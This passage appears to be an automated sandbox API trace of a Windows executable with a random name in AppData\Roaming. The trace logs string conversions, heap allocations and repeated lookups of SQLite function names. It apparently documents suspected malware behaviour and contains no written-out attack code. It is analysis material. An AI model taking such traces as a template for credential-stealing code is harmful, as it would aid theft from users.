¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0202.336] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x415f73c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0eÛ¨\x92tù\x15\x04Z§L\x04\x88\x19á\x02¸ÈM\x04h\x17á\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0202.336] GetLastError () returned 0x0 [0202.336] SetLastError (dwErrCode=0x0) [0202.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x415f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0202.336] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0202.337] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x415ef88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0202.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x415f63c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0eÛ¨\x92tù\x15\x04Z§L\x04\x88\x19á\x02¸ÈM\x04h\x17á\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0202.337] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x44de440, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.337] SetLastError (dwErrCode=0x0) [0202.337] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf) returned 0x2e11990 [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] GetLastError () returned 0x0 [0202.338] SetLastError (dwErrCode=0x0) [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x98) returned 0x2e119a8 [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1f) returned 0x2e11a48 [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x36) returned 0x2e11a70 [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x37) returned 0x2e11ab0 [0202.338] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x3c) returned 0x2e11af0 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x31) returned 0x2e11b38 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x17) returned 0x2e11b78 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x24) returned 0x2e11b98 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x14) returned 0x2e11bc8 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0xd) returned 0x2e11be8 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x25) returned 0x2e11c00 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x39) returned 0x2e11c30 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x18) returned 0x2e11c78 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x17) returned 0x2e11c98 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0xe) returned 0x2e11cb8 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x69) returned 0x2e11cd0 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x3e) returned 0x2e11d48 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1b) returned 0x2e11d90 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1d) returned 0x2e11db8 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x48) returned 0x2e11de0 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x12) returned 0x2e11e30 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x18) returned 0x2e11e50 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1b) returned 0x2e11e70 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x24) returned 0x2e11e98 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x29) returned 0x2e11ec8 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1e) returned 0x2e11f00 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x41) returned 0x2e11f28 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x17) returned 0x2e11f78 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0xf) returned 0x2e11f98 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x16) returned 0x2e11fb0 [0202.339] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x2a) returned 0x2e11fd0 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x29) returned 0x2e12008 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x15) returned 0x2e12040 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x1e) returned 0x2e12060 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x2a) returned 0x2e12088 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x12) returned 0x2e120c0 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x18) returned 0x2e120e0 [0202.340] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x46) returned 0x2e12100 [0202.340] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e109f0 | out: hHeap=0x2e10000) returned 1 [0202.341] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x80) returned 0x2e109f0 [0202.341] RtlSizeHeap (HeapHandle=0x2e10000, Flags=0x0, MemoryPointer=0x2e109f0) returned 0x80 [0202.341] lstrcmpA (lpString1="sqlite3_aggregate_context", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_aggregate_count", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_auto_extension", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_backup_finish", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_backup_init", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_backup_pagecount", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_backup_remaining", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_backup_step", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_bind_blob", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_bind_double", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_bind_int", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_bind_int64", lpString2="sqlite3_open") returned -1 [0202.341] lstrcmpA (lpString1="sqlite3_bind_null", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_parameter_count", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_parameter_index", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_parameter_name", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_text", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_text16", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_value", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_bind_zeroblob", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_blob_bytes", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_blob_close", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_blob_open", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_blob_read", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_blob_write", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_busy_handler", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_busy_timeout", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_changes", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_clear_bindings", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_close", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_collation_needed", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_collation_needed16", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_blob", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_bytes", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_bytes16", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_count", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_decltype", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_decltype16", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_double", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_int", lpString2="sqlite3_open") returned -1 [0202.342] lstrcmpA (lpString1="sqlite3_column_int64", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_name", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_name16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_text", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_text16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_type", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_column_value", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_commit_hook", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_complete", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_complete16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_context_db_handle", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_collation", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_collation16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_collation_v2", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_function", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_function16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_module", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_create_module_v2", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_data_count", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_db_handle", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_declare_vtab", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_enable_load_extension", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_enable_shared_cache", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_errcode", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_errmsg", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_errmsg16", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_exec", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_expired", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_extended_result_codes", lpString2="sqlite3_open") returned -1 [0202.343] lstrcmpA (lpString1="sqlite3_file_control", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_finalize", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_free", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_free_table", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_get_autocommit", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_get_auxdata", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_get_table", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_global_recover", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_interrupt", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_last_insert_rowid", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_libversion", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_libversion_number", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_limit", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_load_extension", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_malloc", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_memory_alarm", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_memory_highwater", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_memory_used", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mprintf", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mutex_alloc", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mutex_enter", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mutex_free", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mutex_leave", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_mutex_try", lpString2="sqlite3_open") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_open", lpString2="sqlite3_open") returned 0 [0202.344] lstrcmpA (lpString1="sqlite3_aggregate_context", lpString2="sqlite3_close") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_aggregate_count", lpString2="sqlite3_close") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_auto_extension", lpString2="sqlite3_close") returned -1 [0202.344] lstrcmpA (lpString1="sqlite3_backup_finish", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_backup_init", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_backup_pagecount", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_backup_remaining", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_backup_step", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_blob", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_double", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_int", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_int64", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_null", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_parameter_count", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_parameter_index", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_parameter_name", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_text", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_text16", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_value", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_bind_zeroblob", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_blob_bytes", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_blob_close", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_blob_open", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_blob_read", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_blob_write", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_busy_handler", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_busy_timeout", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_changes", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_clear_bindings", lpString2="sqlite3_close") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_close", lpString2="sqlite3_close") returned 0 [0202.345] lstrcmpA (lpString1="sqlite3_aggregate_context", lpString2="sqlite3_prepare_v2") returned -1 [0202.345] lstrcmpA (lpString1="sqlite3_aggregate_count", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_auto_extension", lpString2="sqlite3_prepare_v2") returned -1 